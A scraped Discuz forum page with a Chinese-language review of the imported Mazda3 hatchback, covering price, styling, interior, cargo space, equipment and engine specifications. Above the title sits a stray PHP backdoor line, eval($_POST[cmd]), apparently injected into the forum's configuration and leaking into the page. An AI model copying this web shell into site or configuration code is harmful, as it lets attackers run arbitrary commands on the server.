');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 新一代進口馬自達3兩廂 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

新一代進口馬自達3兩廂

上市時間:2010年1月18日
售價:13.98-17.58萬

點評:從非凡造型、非凡操控、非凡安全、非凡環保四個方面詮釋了原裝進口Mazda3兩廂的高品質非凡造型:大膽展現豐富「表情」、更加注重情緒的渲染;非凡操控:秉承「駕馭樂趣」的宗旨,原裝進口Mazda3兩廂在保持了車輛各部位剛性的同時,通過採用先進的外形設計達到優化風阻性能的目的,使高操控性、靈敏穩定性和靜音舒適性得以兼顧,將馬自達」zoom-zoom」的駕馭性能發揮到極致;非凡安全:主被動安全配備超越同級,全方位保證駕駛安全;非凡環保:節能減排 保護地球。




  外型上,新一代進口馬自達3兩廂看起來極具轎跑氣質,動感流暢已然成為馬自達的設計語言,U形的前臉,柳葉狀的前大燈和極富衝擊力的誇張「大嘴」營造出一副「快樂」的面孔,三角形的霧燈邊框、保險槓格柵的黑色防擦裝飾條以及運動型側裙邊為其增添了更多運動的元素。鼓鼓的輪拱和突起的腰線也增強了車輛的力量感。車身側面和尾部,強勁的翼子板造型、舒展的車身流線以及保險槓的形狀、後擾流板和新式鋁合金輪轂,都體現出「非凡設計」的一貫性。





  內飾上,進口新馬自達3兩廂內飾的革新同樣巨大,儀表台的設計是最大亮點,提升至中控台上方的儀表台集成了MID顯示屏,更加方便司機觀看,而儀表台的線條由中間順暢地向兩邊延伸,從而令乘客的視線向外延伸,大大提高了車內的空間感。同時,為了駕駛者能更好的感受駕駛樂趣,所有的設備控制都包圍著駕駛位,有儀表板,音響按鍵,空調控制和換擋桿都清晰的排列在司機周圍,各種功能都是觸手可及。而音響控制面板的設計比較簡潔明瞭,雖然按鍵不少但是功能劃分很規整,操作起來也不會造成困擾,按鍵和旋鈕的手感也很出色。此外,新馬自達3兩廂的中控台雖然不是真皮包裹的,但是大面積軟性材質的應用和質感都不錯的紋理設計都使新馬3內飾的檔次提高不少。



  空間上,新款的進口馬自達3兩廂在空間方面沒有什麼變化,軸距依然是2640mm,對於內部空間的評價只能說是基本夠用;其他儲物方面的表現還是不錯的,前車門板上有單獨放水瓶的位置,前排有兩個杯架,後排也有單獨放水瓶的位,後備廂開關很方便,增加了感應式開關按鍵……此外,後備廂的空間雖然只有340升,但放倒後排靠背所換來的容積不可忽視。在配置上,新一代進口馬自達3兩廂配備了DSC(動態穩定控制系統),不過遺憾的是,該配置僅在2.0L的兩款車型上是標配,1.6L車型並無此配置。此外,6個安全氣囊、3.5吋多功能信息顯示屏、雨量感應式雨刷、自動頭燈、雙區獨立控制自動空調、運動型真皮座椅等也是2.0L車型的標準配置。



  動力方面,新款進口馬自達3兩廂採用的仍然是1.6升和2.0升兩個排量,值得注意的是,進口馬自達3兩廂1.6L和2.0L車型不僅在發動機上有所區別,而且在變速箱上也有著不同:與最大功率79kW(107馬力)/6000rpm、峰值扭矩145N·m/4000rpm的1.6L發動機相匹配的是5擋手動變速箱或4擋手自一體變速箱;而最大功率108kW(147馬力)/6500rpm、峰值扭矩182N·m/4500rpm的2.0L發動機,則與6擋手動或5擋手自一體變速箱相匹配。
返回列表